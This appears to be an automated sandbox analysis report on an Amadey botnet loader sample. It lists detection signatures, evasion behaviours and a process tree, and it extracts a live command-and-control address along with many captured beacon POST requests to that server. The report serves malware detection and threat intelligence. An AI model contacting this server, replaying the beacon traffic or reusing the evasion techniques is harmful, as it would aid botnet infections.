Edit tour

Windows Analysis Report
UyiH4t5dph.exe

Overview

General Information

Sample name:	UyiH4t5dph.exe renamed because original name is a hash value
Original sample name:	9d38889192a887e1128ec41dd417fb6d.exe
Analysis ID:	1578883
MD5:	9d38889192a887e1128ec41dd417fb6d
SHA1:	bf6b8a7c9ea4519ee2b4233375b9cf2cc9c7840b
SHA256:	b23adb76c30005dc9d5391fd1f1218b36b6b0cb85b63f5cb9aeeb0cb01d77963
Tags:	exeuser-abuse_ch
Infos:

Detection

Amadey

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Potentially malicious time measurement code found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Drops PE files

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

UyiH4t5dph.exe (PID: 7852 cmdline: "C:\Users\user\Desktop\UyiH4t5dph.exe" MD5: 9D38889192A887E1128EC41DD417FB6D)

skotes.exe (PID: 8080 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 9D38889192A887E1128EC41DD417FB6D)

skotes.exe (PID: 2216 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 9D38889192A887E1128EC41DD417FB6D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000006.00000003.1959422053.00000000050C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000003.1452607613.00000000046A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.1424348425.0000000005290000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
2.2.skotes.exe.be0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.UyiH4t5dph.exe.2d0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
6.2.skotes.exe.be0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Suricata Signatures

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T16:09:42.738579+0100	2856147	1	A Network Trojan was detected	192.168.2.8	49723	185.215.113.43	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: UyiH4t5dph.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp

Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Source: UyiH4t5dph.exe	Virustotal: Detection: 54%			Perma Link
Source: UyiH4t5dph.exe	ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: UyiH4t5dph.exe

Joe Sandbox ML: detected

Source: UyiH4t5dph.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:49723 -> 185.215.113.43:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: 185.215.113.43

Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Joe Sandbox View

IP Address: 185.215.113.43 185.215.113.43

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43

Source: C:\Users\user\Desktop\UyiH4t5dph.exe

Code function: 0_2_002DE0C0 recv,recv,recv,recv,

0_2_002DE0C0

Source: unknown

HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: skotes.exe, 00000006.00000003.2274997620.00000000012F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php.WSE
Source: skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php32i
Source: skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php8
Source: skotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.2274997620.00000000012F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php9
Source: skotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php:
Source: skotes.exe, 00000006.00000002.2685806269.00000000012B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpB
Source: skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.2274997620.00000000012F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpD
Source: skotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpE
Source: skotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.2274997620.00000000012F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpT
Source: skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpcoded8
Source: skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded
Source: skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpi
Source: skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpiP
Source: skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpl
Source: skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.2274997620.00000000012F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpv
Source: skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpve
Source: skotes.exe, 00000006.00000002.2685806269.00000000012B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/d

System Summary

PE file contains section with special chars

Source: UyiH4t5dph.exe	Static PE information: section name:
Source: UyiH4t5dph.exe	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_00BFCB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,

6_2_00BFCB97

Source: C:\Users\user\Desktop\UyiH4t5dph.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Code function: 0_2_002D5C83	0_2_002D5C83
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	Code function: 0_2_002D735A	0_2_002D735A
